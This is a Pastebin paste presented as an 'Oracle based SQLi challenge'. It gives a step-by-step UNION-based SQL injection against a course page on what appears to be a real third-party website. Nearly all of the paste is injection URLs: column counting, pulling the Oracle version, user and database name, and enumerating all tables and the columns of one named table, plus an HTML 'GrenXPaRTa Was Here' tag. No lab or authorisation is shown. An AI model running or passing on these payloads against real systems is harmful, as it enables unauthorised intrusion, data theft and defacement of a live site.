API tools faq
paste
Advertisement
9r3nXPaRTa

Oracle based Sqli Challenge By GrenXPaRTa

9r3nXPaRTa
Nov 23rd, 2021
1,862
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
SQL 2.45 KB | None | 0 0
raw download clone embed print report
  1. Oracle based Sqli Challenge BY GrenXPaRTa
  2.  
  3. lets BEGIN::
  4. https://sv032.basauri.net/cursos/detalle-curso-vista.php?idc=44
  5.  
  6. https://sv032.basauri.net/cursos/detalle-curso-vista.php?idc=44' more errors
  7.  
  8. https://sv032.basauri.net/cursos/detalle-curso-vista.php?idc=44'-- not balanced
  9.  
  10. https://sv032.basauri.net/cursos/detalle-curso-vista.php?idc=44--
  11.  
  12. https://sv032.basauri.net/cursos/detalle-curso-vista.php?idc=44 ORDER BY 1--
  13.  
  14. https://sv032.basauri.net/cursos/detalle-curso-vista.php?idc=44 ORDER BY 2-- more errors seems 1 column
  15.  
  16. https://sv032.basauri.net/cursos/detalle-curso-vista.php?idc=-44 UNION SELECT NULL FROM dual-- No columns shown lets increase columns to 2
  17.  
  18. https://sv032.basauri.net/cursos/detalle-curso-vista.php?idc=-44 UNION SELECT 'test',NULL FROM dual-- we saw test it means column 1 is vuln column
  19.  
  20. https://sv032.basauri.net/cursos/detalle-curso-vista.php?idc=-44 UNION SELECT (SELECT banner FROM v$version WHERE rownum=1),NULL FROM dual-- We saw version Oracle Database 11g
  21.  
  22. https://sv032.basauri.net/cursos/detalle-curso-vista.php?idc=-44 UNION SELECT USER,NULL FROM dual-- We saw user lets get database
  23.  
  24. https://sv032.basauri.net/cursos/detalle-curso-vista.php?idc=-44 UNION SELECT sys.database_name,NULL FROM dual--
  25.  
  26. We saw DATABASE name lets USE ALL at once We cant USE || AND + challenge rules so lers USE concat inside another concat
  27.  
  28. concat(concat(1,2),2) LIKE that lets GET ALL concat(concat(concat(concat(concat(concat('<font color=red>GrenXPaRTa Was Here</font><br>Version::',(SELECT banner FROM v$version WHERE rownum=1)),'<br>User::'),USER),'<br>Database::'),sys.database_name),'<br>')
  29.  
  30. https://sv032.basauri.net/cursos/detalle-curso-vista.php?idc=-44 UNION SELECT concat(concat(concat(concat(concat(concat('GrenXPaRTa Was Here<br>Version::',(SELECT banner FROM v$version WHERE rownum=1)),'<br>User::'),USER),'<br>Database::'),sys.database_name),'<br>'),NULL FROM dual-- Lets get all tables
  31.  
  32. https://sv032.basauri.net/cursos/detalle-curso-vista.php?idc=-44 UNION SELECT TABLE_NAME,NULL FROM all_tables-- We get many tables lets get all columns
  33.  
  34. https://sv032.basauri.net/cursos/detalle-curso-vista.php?idc=-44 UNION SELECT column_name,NULL FROM all_tab_columns-- We get all columns now lets extract for a table
  35.  
  36. https://sv032.basauri.net/cursos/detalle-curso-vista.php?idc=-44 UNION SELECT column_name,NULL FROM all_tab_columns WHERE TABLE_NAME='AADATOSTRAZA'--
  37.  
  38. Thanks TO ALL Friend Member SQL Injection
  39. ✍🏻✍🏻✍🏻
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!